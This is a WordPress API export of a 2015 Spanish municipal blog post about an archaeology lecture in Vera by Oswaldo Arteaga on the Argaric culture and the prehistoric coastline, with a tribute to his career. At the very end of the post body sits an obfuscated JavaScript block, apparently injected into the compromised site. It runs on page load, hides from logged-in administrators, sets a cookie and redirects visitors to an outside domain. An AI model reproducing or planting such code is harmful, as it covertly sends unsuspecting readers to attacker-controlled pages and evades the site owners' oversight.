{"id":1699,"date":"2015-12-10T12:01:34","date_gmt":"2015-12-10T12:01:34","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=1699"},"modified":"2015-12-10T12:16:57","modified_gmt":"2015-12-10T12:16:57","slug":"una-jornada-arqueologica-en-vera-con-oswaldo-arteaga-catedratico-emerito-de-prehistoria-de-la-universidad-de-sevilla-19-noviembre-2015","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2015\/12\/10\/una-jornada-arqueologica-en-vera-con-oswaldo-arteaga-catedratico-emerito-de-prehistoria-de-la-universidad-de-sevilla-19-noviembre-2015\/","title":{"rendered":"UNA JORNADA ARQUEOL\u00d3GICA EN VERA CON OSWALDO ARTEAGA"},"content":{"rendered":"<p class=\"western\">El 19 de noviembre se oficiaron las VI JORNADAS de ESTUDIO SOBRE LA CULTURA ARG\u00c1RICA que viene celebrando la Asociaci\u00f3n Amigos de El Argar y la Fundaci\u00f3n Pedro Flores, en colaboraci\u00f3n con el Museo Hist\u00f3rico Municipal.<\/p>\n<p class=\"western\"><!--more--><\/p>\n<p class=\"western\" style=\"text-align: right\">\n<p class=\"western\" style=\"text-align: right\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/10\/Domingo-Ortiz-2012.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-1559\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/10\/Domingo-Ortiz-2012.jpg\" alt=\"Domingo Ortiz 2012\" width=\"160\" height=\"264\" \/><\/a><\/p>\n<p class=\"western\" style=\"text-align: right\">Domingo Ortiz Soler<\/p>\n<p class=\"western\" style=\"text-align: right\">Museo Hist\u00f3rico Municipal<\/p>\n<p class=\"western\" style=\"text-align: right\">del Ayuntamiento de Vera<\/p>\n<p class=\"western\">UNA JORNADA ARQUEOL\u00d3GICA EN VERA CON OSWALDO ARTEAGA. CATEDR\u00c1TICO EM\u00c9RITO DE PREHISTORIA DE LA UNIVERSIDAD DE SEVILLA.\u00a0 19 Noviembre 2015<\/p>\n<p class=\"western\"><span style=\"font-size: small\">Con la participaci\u00f3n del Dr. Oswaldo Arteaga Matute, catedr\u00e1tico Em\u00e9rito de Prehistoria en la Universidad de Sevilla y Anna Maria Roos, doctora en Geograf\u00eda e Historia Antigua y el Presidente de la Asociaci\u00f3n Amigos de El Argar y de la Fundaci\u00f3n Pedro Flores, Juli\u00e1n P\u00e9rez Flores. <\/span><\/p>\n<p class=\"western\"><span style=\"font-size: small\">Con la participaci\u00f3n de Oswaldo Arteaga y se\u00f1ora, junto al presidente de la Asociaci\u00f3n se inici\u00f3 la actividad en la sala del Convento de la Victoria protocolada por Isabel de Haro, Concejala de Cultura, en la mesa organizada previamente por el servicio de protocolo correspondiente, con las palabras de bienvenida a los conferenciantes y coordinadores. El presidente de la Asociaci\u00f3n Amigos de EL Argar, explicaba la iniciativa de estas Jornadas y a continuaci\u00f3n la conferencia fue presentada por Domingo Ortiz, como director del Museo Hist\u00f3rico Municipal (que se transcribe a continuaci\u00f3n), tras lo cual se inici\u00f3 la magistral conferencia titulada \u00ab<\/span><span style=\"font-size: small\"><i>EL LITORIAL PREHIST\u00d3RICO EN LA DEPRESI\u00d3N DE VERA. UNA VISI\u00d3N DESDE LA GEOARQUEOLOG\u00cdA DIALECTICA<\/i><\/span><span style=\"font-size: small\">\u00ab. Despu\u00e9s se llev\u00f3 a cabo un turno de preguntas y finalizando con la entrega de unas reproducciones de la cer\u00e1mica popular de Vera, a dichos investigadores y presidente de la Asociaci\u00f3n, clausurando esta jornada arqueol\u00f3gica con unas palabras por parte de la concejala. A continuaci\u00f3n la Concejal\u00eda de Cultura ofreci\u00f3 un vino a los numerosos asistentes donde se departi\u00f3 con los conferenciantes interesantes preguntas y respuestas a las dudas de los asistentes..<\/span><\/p>\n<p class=\"western\"><span style=\"font-size: small\">Esta organizaci\u00f3n ha sido promovida por la Concejal\u00eda de Cultura del Ayuntamiento de Vera, Museo Hist\u00f3rico Municipal de Vera, Asociaci\u00f3n amigos de El Argar y la Fundaci\u00f3n Pedro Flores, con la coordinaci\u00f3n de Juli\u00e1n P\u00e9rez Flores, arquitecto y biznieto de Pedro Flores que fue ayudante de campo del ingeniero y arque\u00f3logo Louis Siret, y Domingo Ortiz, arque\u00f3logo y Director del Museo Hist\u00f3rico Municipal del Ayuntamiento de Vera.<\/span><\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-1702\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald-300x168.jpg\" alt=\"Blog oswald\" width=\"300\" height=\"168\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald-300x168.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald-1024x575.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald.jpg 1632w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\"><span style=\"font-size: large\"><b>Extracto de la presentaci\u00f3n de la conferencia<\/b><\/span><\/p>\n<p class=\"western\">Con esta presentaci\u00f3n hacemos un breve recorrido por su obra, su personalidad y su fruct\u00edfera colaboraci\u00f3n con la arqueolog\u00eda espa\u00f1ola basada en mis experiencias de trabajo con \u00e9l, como maestro que fue en aquellos tiempos ya \u2018inmemoriales\u2019.<\/p>\n<p class=\"western\">Nos conocimos all\u00e1 por el a\u00f1o 1975 en unas excavaciones arqueol\u00f3gicas en las ruinas greco-romanas de Ampurias (Gerona), durante un curso de Arqueolog\u00eda \u2013recordando tambi\u00e9n al prof. Oikonomides-, donde trabamos una amistad y colaboraci\u00f3n desde entonces, recordando como si fuese ayer, los a\u00f1os posteriores en Granada y en Almer\u00eda y nuestras prospecciones arqueol\u00f3gicas en esta zona del Levante, que le sirvi\u00f3 para conocer en profundidad la importancia arqueol\u00f3gica de este territorio.<\/p>\n<p class=\"western\">All\u00ed surgi\u00f3 la visita a Fuente \u00c1lamo, que fue lo que dar\u00eda lugar a las primeras campa\u00f1as de excavaciones arqueol\u00f3gicas \u2013desde los tiempos de Siret- con el Dr. Schubart, que fue director del Instituto Arqueol\u00f3gico Alem\u00e1n en Madrid, conformando un equipo de trabajo para codirigir las campa\u00f1as de excavaciones desde 1977, y que viene a \u2018<i>mi memoria hist\u00f3rica<\/i>\u2019 gratos recuerdos de aquellos primeros trabajos.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Fuente-alamo-1977.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-1707\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Fuente-alamo-1977-300x220.jpg\" alt=\"Fuente alamo 1977\" width=\"300\" height=\"220\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Fuente-alamo-1977-300x220.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Fuente-alamo-1977-1024x749.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i>Algunos miembros del equipo de trabajo en Fuente \u00c1lamo<\/i><\/span><\/p>\n<p class=\"western\">Nost\u00e1lgicos recuerdos de aquellos a\u00f1os me obligan ha reconocer que el \u2018tiempo arqueol\u00f3gico\u2019 pasa y la amistad permanece. Y haciendo una detallada rese\u00f1a de la profesionalidad de Oswaldo, decir que es un trabajador incansable y entusiasta.<\/p>\n<p class=\"western\">Y, esta particular forma de ser caracteriza todo aquello que emprende. Y con la energ\u00eda, el carisma y el entusiasmo que le caracterizan, desarroll\u00f3 m\u00faltiples actividades en el campo de la investigaci\u00f3n arqueol\u00f3gica; actividades que han dejado una huella imborrable en la arqueolog\u00eda de nuestro pa\u00eds. Dedicaci\u00f3n que le agradecemos en estas Jornadas de Estudio sobre la Cultura de El Argar, que este a\u00f1o desarrollamos en Vera, como una consideraci\u00f3n a su se\u00f1a de identidad con la Arqueolog\u00eda.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Fuente-Alamo1977.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1708\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Fuente-Alamo1977-300x204.jpg\" alt=\"Fuente Alamo1977\" width=\"300\" height=\"204\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Fuente-Alamo1977-300x204.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Fuente-Alamo1977.jpg 946w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i>Oswaldo Arteaga y el profesor Schubart, durante el an\u00e1lisis del ajuar de una tumba en cista, con una cer\u00e1mica lenticular.<\/i><\/span><\/p>\n<p><span style=\"font-family: Cambria,Cambria,sans-serif\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\">Catedr\u00e1tico Em\u00e9rito de Prehistoria en la Universidad de Sevilla. Fue Director del Departamento de Prehistoria y Arqueolog\u00eda entre 1992 y 2005. Desarroll\u00f3 docencia en las universidades de Sevilla; C\u00e1diz; Granada; Aut\u00f3noma de Madrid; Salamanca; Valencia; Escuela Nacional de Antropolog\u00eda e Historia (M\u00e9xico D.F.); y en la Universidad de Oriente (Cuman\u00e1, Venezuela). Y, Miembro Correspondiente del Deutsches Arch\u00e4ologisches Institut (Berlin). <\/span><\/span><span style=\"font-family: Times New Roman,serif\">Y, recientemente, sido investido como <\/span><span style=\"font-family: Times New Roman,serif\">Miembro de N\u00famero en la <\/span><span style=\"font-family: Times New Roman,serif\"><b>Academia Andaluza de la Historia.<\/b><\/span><\/span><\/p>\n<p><span style=\"font-family: Times New Roman,serif\">Tambi\u00e9n conllev\u00f3 direcci\u00f3n de Proyectos de Investigaci\u00f3n (Ministerio de Cultura \u2013 Madrid; Junta de Andaluc\u00eda; DAI \u2013 Madrid); entre otros destacan proyectos como: Los Saladares; Tossal del Moro; Pe\u00f1\u00f3n de Salobre\u00f1a; Proyecto Fenicio-P\u00fanico de la Axarqu\u00eda de V\u00e9lez-M\u00e1laga; Iliturgi; Fuente \u00c1lamo; Reconstrucci\u00f3n del proceso hist\u00f3rico en el territorio de la ciudad iberorromana de Obulco (Proyecto Porcuna); as\u00ed como los proyectos interdisciplinares de Geoarqueolog\u00eda Dial\u00e9ctica: Costas Andaluzas; Marismas del Guadalquivir; Ant\u00edpolis (Bah\u00eda de C\u00e1diz); y Geoarqueolog\u00eda Urbana de C\u00e1diz. <\/span><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald..jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1703\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald.-300x193.jpg\" alt=\"Blog oswald.\" width=\"300\" height=\"193\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald.-300x193.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald.-1024x658.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald..jpg 1507w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><span style=\"font-family: Times New Roman,serif\">Llev\u00f3 a cabo la direcci\u00f3n de reuniones cient\u00edficas, entre otras: Congreso Internacional en Homenaje a Luis Siret; Primeras Jornadas de Arqueolog\u00eda Andaluza; I Congreso Iberoamericano de Arqueolog\u00eda Social; Congreso Internacional de Geoarqueolog\u00eda e Historia de la Bah\u00eda de C\u00e1diz; y participaci\u00f3n en numerosos comit\u00e9s cient\u00edficos. Igualmente estuvo en Estancias de investigaci\u00f3n en los centros extranjeros de DAI (Bonn,); Centro de Investigaci\u00f3n del DAI en Cartago (T\u00fanez); del DAI (Frankfurt); Universit\u00e4t Bremen (Alemania); Universit\u00e9 de Nantes (Francia), entre otros. <\/span><\/p>\n<p class=\"western\">Como vemos, a lo largo de su dilatada carrera profesional, el abanico de sus investigaciones es amplio. El Dr. Arteaga ha venido promoviendo cuatro amplias vertientes de investigaci\u00f3n, cuyos estudios abarcan desde los tiempos prehist\u00f3ricos calcol\u00edticos hasta la Edad del Bronce del suroeste peninsular \u2013y como no- estudiando la cultura arg\u00e1rica-, pasando tambi\u00e9n por los protohist\u00f3ricos relativos a las sociedades fenicias y tartesias, ib\u00e9ricas y p\u00fanicas, hasta la \u00e9poca romana. Oswaldo Arteaga es uno de los <strong>grandes historiadores<\/strong> que hacia \u00a0finales de los a\u00f1os 70 del siglo pasado aplicaron la <strong>Metodolog\u00eda Cient\u00edfica de Excavaci\u00f3n Arqueol\u00f3gica en Andaluc\u00eda.<\/strong><\/p>\n<p class=\"western\">Entre 1977 y 1999 desarroll\u00f3 sus investigaciones, junto al Dr. Schubart, en el yacimiento arqueol\u00f3gico de Fuente \u00c1lamo (Cuevas del Almanzora), desarrollando una intensa actividad en estas sucesivas campa\u00f1as, siendo muy numeroso el grupo de colaboradores que participaron activamente en aquellas excavaciones, entre los que me encontraba, y que asumieron un papel relevante en el estudio de los materiales y la interpretaci\u00f3n arqueol\u00f3gica de este asentamiento.<\/p>\n<p class=\"western\">En su largo periplo odis\u00e9ico como investigador y como docente en la ense\u00f1anza universitaria, ha formado y apoya a los j\u00f3venes investigadores, les abre v\u00edas, construye puentes entre el mundo arqueol\u00f3gico espa\u00f1ol, el portugu\u00e9s y el alem\u00e1n. Muchos estudiantes, que seguir\u00e1n si\u00e9ndolo aunque hayan pasado los a\u00f1os y ya hayan demostrado su val\u00eda con sus brillantes carreras, confirmamos que en su disciplina es el mejor profesor posible. Es un buen amigo de sus amigos&#8230;, y tambi\u00e9n lo es para muchos de nosotros.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald...jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1704\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald..-300x168.jpg\" alt=\"Blog oswald..\" width=\"300\" height=\"168\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald..-300x168.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald..-1024x575.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald...jpg 1632w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\">Termino mi breve presentaci\u00f3n con una informaci\u00f3n clave:<\/p>\n<p class=\"western\">El Dr. y catedr\u00e1tico Oswaldo Arteaga Matute, ha sido investido como Miembro de N\u00famero en la Academia Andaluza de la Historia, el 6 de marzo de 2015, en Sevilla, pronunciando un discurso sobre Geoarqueolog\u00eda \u2013tema que disertar\u00e1 esta noche-, acompa\u00f1ado de \u00a0Horst D. Schulz (ge\u00f3logo), Lo\u00efc M\u00e9nanteau (ge\u00f3grafo) y esposa Anna-Maria Roos (arque\u00f3loga) como Miembros Correspondientes.Anna-Maria Roos, esposa de Oswaldo, tambi\u00e9n ha recibido esta distinci\u00f3n. Anna es otra de las personalidades importantes de la arqueolog\u00eda de Andaluc\u00eda, miembro del Proyecto Arqueol\u00f3gico Porcuna, su tesis Doctoral (1997) \u00a0es de vital importancia para la historia de Porcuna: <i>La sociedad de clases, la propiedad privada y el Estado en Tartesos. Una visi\u00f3n de su proceso hist\u00f3rico desde la arqueolog\u00eda del \u2018Proyecto Porcuna\u2019<\/i>. Universidad de Granada.<\/p>\n<p class=\"western\" align=\"justify\">Hoy d\u00eda 19 de noviembre de 2015, es una fecha que pasar\u00e1 a los anales de las actividades del Museo Hist\u00f3rico Municipal del Ayuntamiento de Vera, que junto con la Asociaci\u00f3n Amigos de El Argar,\u00a0 celebra esta jornada arqueol\u00f3gica a modo de homenaje-reconocimiento a la figura del Dr. Oswaldo Arteaga, prestigioso investigador de la prehistoria y protohistoria de la Pen\u00ednsula Ib\u00e9rica y esposa Anna Maria Ros, inseparable compa\u00f1era en tareas arqueol\u00f3gicas.<\/p>\n<p class=\"western\" align=\"justify\">La Asociaci\u00f3n Amigos de El Argar, de la que es pionero-fundador mi colega Juli\u00e1n P\u00e9rez \u2013de la que somos miembros activos-, viene realizando anualmente una serie de actos de reconocimiento a todos aquellos que han tenido un papel relevante en la historia de la investigaci\u00f3n del patrimonio arqueol\u00f3gico almeriense.<\/p>\n<p class=\"western\" align=\"justify\">Entre las contribuciones del Dr. Oswaldo Arteaga y la Dra. Ross a la Arqueolog\u00eda de nuestra tierra cabe dedicarles este agradecimiento. Y que junto con el MHM y el incondicional apoyo de la Concejal\u00eda de Cultura continuaremos esta l\u00ednea de actividades futuras.<\/p>\n<p class=\"western\">Esperamos que el Dr. Arteaga, jubilado de su C\u00e1tedra de Historia desde hace un a\u00f1o, pueda dedicar parte de su valioso tiempo a continuar estudiando la cultura arg\u00e1rica con el reinicio de nuevas excavaciones en el poblado de Fuente \u00c1lamo de Cuevas del Almanzora y El Argar de Antas, esperando la ocasi\u00f3n, tambi\u00e9n, para su colaboraci\u00f3n en otro asentamiento arg\u00e1rico que disponemos en el Cerro del Esp\u00edritu Santo de Vera y del Bronce Final en el cerro del Pajarraco tambi\u00e9n en nuestra localidad, Pago de San Ant\u00f3n y que \u00e9l ya conoce.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald....jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1701\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald...-213x300.jpg\" alt=\"Blog oswald...\" width=\"213\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald...-213x300.jpg 213w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Blog-oswald....jpg 399w\" sizes=\"(max-width: 213px) 100vw, 213px\" \/><\/a><\/p>\n<p class=\"western\">En cuanto a su conferencia, decir que este tema es parte de una de sus muchas l\u00edneas de investigaci\u00f3n, que radica en la aplicaci\u00f3n de la Geoarqueolog\u00eda como una ciencia interdisciplinar abocada en el estudio de las transformaciones paleoambientales y alteraciones ecol\u00f3gicas ocurridas en las costas atl\u00e1nticas-mediterr\u00e1neas de Andaluc\u00eda durante todo el Holoceno.<\/p>\n<p class=\"western\">En aquellos tiempos de los a\u00f1os setenta, de prospecciones y excavaciones arqueol\u00f3gicas en Fuente \u00c1lamo, ya hablamos de las transgresiones y regresiones marinas durante el pleistoceno, por mi experiencia de colaborar con un ge\u00f3logo durante diez a\u00f1os -1972-82-,en esta zona, y a partir tambi\u00e9n de las investigaciones del ge\u00f3logo Gobain Ovejero, un experto sobre el Ne\u00f3geno y Cuaternario del levante espa\u00f1ol, que ya a principios de los a\u00f1os setenta me mostraba ejemplos de l\u00edneas litorales f\u00f3siles, y que durante la \u00e9poca de alto mar se conformar\u00edan peque\u00f1as islotes, o bien promontorios rocosos, mientras que durante la etapa de bajo nivel del mar, la depresi\u00f3n quedar\u00eda totalmente ocupada por una amplia llanura aluvial.<\/p>\n<p class=\"western\">Y que a posteriori un episodio postglaciar se encargar\u00eda de inundar, trayendo consigo, desde el punto de vista paleogeogr\u00e1fico, la formaci\u00f3n de dep\u00f3sitos de playas, junto a cordones litorales colgados (improntas de antiguas playas f\u00f3siles). Y en otros momento geol\u00f3gicos niveles de marismas antiguas, entre la desembocadura de los r\u00edos. Todo ello a partir de sus trabajos de regresiones y transgresiones marinas durante el Pleistoceno Superior.<\/p>\n<p class=\"western\">El prop\u00f3sito de estos trabajos geoarqueol\u00f3gicos estriba en evaluar el impacto antr\u00f3pico que sobre la naturaleza han venido propiciando las sucesivas formaciones sociales que desde la Prehistoria hasta el presente habitaron en estos espacios litorales, conformando la plasmaci\u00f3n de los paisajes que ahora se observan.<\/p>\n<p class=\"western\">Hace ya m\u00e1s de 30 a\u00f1os, que Oswaldo Arteaga, al conocer estos fen\u00f3menos en profundidad durante la parte de su formaci\u00f3n que tuvo lugar en Alemania, se dio cuenta de que era imposible comprender la Prehistoria y Protohistoria de Andaluc\u00eda utilizando los mapas actuales que, en ocasiones, distaban mucho de representar la superficie terrestre y mar\u00edtima y los paisajes de esas \u00e9pocas.<\/p>\n<p class=\"western\">Concibi\u00f3 as\u00ed la idea de crear un grupo de investigaci\u00f3n interdisciplinar que contase con prehistoriadotes, ge\u00f3logos, paleont\u00f3logos, ge\u00f3grafos y arque\u00f3logos. Naci\u00f3 as\u00ed la llamada \u201cGeoarqueolog\u00eda de Andaluc\u00eda\u201d.<\/p>\n<p class=\"western\">Gracias a sus denodados esfuerzos e importantes logros, y al apoyo de las autoridades acad\u00e9micas del momento, la Universidad de Sevilla ha sido pionera, a nivel mundial, en este tipo de estudios y es de las primeras en toda Europa que ha ofrecido esta novedosa materia de estudios en sus ense\u00f1anzas de grado y master.En la amplia red de investigadores que se ha ido formando en torno al grupo, podemos destacar como miembros principales o fundadores al prehistoriador Dr. Oswaldo de Arteaga, al ge\u00f3logo y paleont\u00f3logo alem\u00e1n Dr. Horst D. <b>Schulz<\/b> (Universidad de Bremen), el ge\u00f3grafo franc\u00e9s Dr. Lo\u00efc Edouard Marie <b>M\u00e9nanteau<\/b> (Universidad de Nantes), y la arque\u00f3loga alemana Dra. Anna-Maria <b>Roos<\/b> (Instituto Alem\u00e1n de Arqueolog\u00eda de Berl\u00edn). Y esta noche, a la par presentan, en primicia en nuestra localidad, sus conclusiones, tras tres d\u00e9cadas de fruct\u00edfera investigaci\u00f3n multidisciplinar, aplicadas a nuestra zona del levante almeriense, a trav\u00e9s de la conferencia titulada: \u201c<b>El Litoral prehist\u00f3rico en la Depresi\u00f3n de Vera. Una visi\u00f3n desde la Geoarqueolog\u00eda Dial\u00e9ctica<\/b>\u201d. Aparte, decir que la numerosa bibliograf\u00eda proporcionada por las investigaciones y excavaciones de este insigne arque\u00f3logo, practicadas hasta el presente, se encuentran repartidas en contundentes 44 art\u00edculos de revistas especializadas, 23 colaboraciones en obras colectivas y una tesis doctoral dirigida.<\/p>\n<p class=\"western\" style=\"text-align: right\">\n<p class=\"western\" style=\"text-align: right\">\n<p>&nbsp;<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El 19 de noviembre se oficiaron las VI JORNADAS de ESTUDIO SOBRE LA CULTURA ARG\u00c1RICA que viene celebrando la Asociaci\u00f3n Amigos de El Argar y la Fundaci\u00f3n Pedro Flores, en colaboraci\u00f3n con el Museo Hist\u00f3rico Municipal.<\/p>\n","protected":false},"author":7,"featured_media":1708,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[105,20,109,4],"tags":[113,57,112],"class_list":["post-1699","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actividades","category-colaboraciones","category-historia","category-museo","tag-ana-maria-ross","tag-domingo-ortiz-soler","tag-oswaldo-arteaga"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1699","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=1699"}],"version-history":[{"count":7,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1699\/revisions"}],"predecessor-version":[{"id":1712,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1699\/revisions\/1712"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/1708"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=1699"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=1699"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=1699"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}